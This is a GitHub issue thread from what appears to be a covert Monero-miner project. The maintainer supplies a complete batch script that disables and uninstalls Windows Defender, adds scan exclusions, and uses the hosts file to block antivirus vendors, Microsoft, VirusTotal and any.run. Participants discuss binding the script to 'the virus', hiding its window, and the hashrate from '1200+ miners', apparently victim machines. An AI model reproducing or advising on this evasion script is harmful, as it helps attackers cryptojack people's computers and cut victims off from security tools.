### ISSUE TITLE
Windows Defender

### ISSUE THREAD

**Issue by PXCorp** [UnamSanctam/SilentXMRMiner#235]
Do you have a programm/code which turning off windows defender every computer restart?

**Comment by UnamSanctam** [comment]
Well, Windows Defender starts before all programs so if it's still enabled it might remove that but if you run this code as a .bat file just once with administrator privileges it will pretty much do most of what you can do.
```
powershell -Command Add-MpPreference -ExclusionPath '%cd%'
powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%'
powershell -Command Add-MpPreference -ExclusionPath '%AppData%'
powershell -Command Add-MpPreference -ExclusionPath '%Temp%'
powershell -Command Set-MpPreference -DisableArchiveScanning $true
powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true
powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true
powershell -Command Set-MpPreference -DisableScriptScanning $true
powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true
powershell -Command Set-MpPreference -DisableIOAVProtection $true
powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled
powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force
powershell -Command Set-MpPreference -MAPSReporting Disabled
powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
powershell New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
sc config WinDefend start=disabled
sc stop WinDefend
powershell -Command Stop-Service WinDefend 
powershell -Command Set-Service WinDefend -StartupType Disabled
powershell -Command Uninstall-WindowsFeature -Name Windows-Defender
powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI
Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
echo 127.0.0.1       www.malwarebytes.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       malwarebytes.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       avast.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       www.avast.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       www.mcafee.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       mcafee.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       www.kaspersky.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       kaspersky.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       www.norton.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       norton.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       microsoft.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       www.microsoft.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       any.run >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       www.any.run >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       virustotal.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       www.virustotal.com >> "%SystemRoot%\System32\drivers\etc\hosts" 
```

**Comment by PXCorp** [comment]
K thx

**Comment by WexisQ** [comment]
![Capture](https://user-images.githubusercontent.com/83571493/117155187-3ab47680-adc5-11eb-9066-402b1c17f074.PNG)
What exactly do these codes do? when the computer is restarted, does it get windows defender? Does it have to do with other antiviruses?
![Capture](https://user-images.githubusercontent.com/83571493/117155780-bd3d3600-adc5-11eb-95f2-97530012b0fb.PNG)
why are there antivirus names here, what does it do?

**Comment by UnamSanctam** [comment]
First commands set Windows Defender options like turning of certain scans and the next ones try to disable Windows Defender completely and the last 'echo' options try to add website into the hosts file (the sites added can't be reached since it will redirect the traffic to 127.0.0.1).

**Comment by WexisQ** [comment]
that is, when the computer is turned on, windows defender will be dont opened again, right? And What happens when the host file is added to the website? and also Is it enough to write this code into .bat and bind it with the virus, right?

**Comment by UnamSanctam** [comment]
Windows Defender will be disabled and if you open it then it will say that it's disabled, those commands are made by Microsoft for that purpose. When the URLs are added to the hosts file it redirect the traffic to those sites to 127.0.0.1. It should be enough to bind it but the problem is that the CMD window will show while it's working so you might have to find some method to hide it.

**Comment by WexisQ** [comment]
I have about 1200+ miners. I get 6k h / s. In between, there is 18k h / s or something, but in general, why 5k-10k this is so low?

**Comment by UnamSanctam** [comment]
Because you don't have 1200+ miners, it would be higher if you did.

**Comment by WexisQ** [comment]
While miners miner with 30 s / h, it suddenly falls 9-10 s / h, then rises again after 1-2 minutes, what is the reason?

**Comment by UnamSanctam** [comment]
Because mining is luck based so the short term hashrate will fluctuate since it will be quite random. This is why we check the long term average instead.
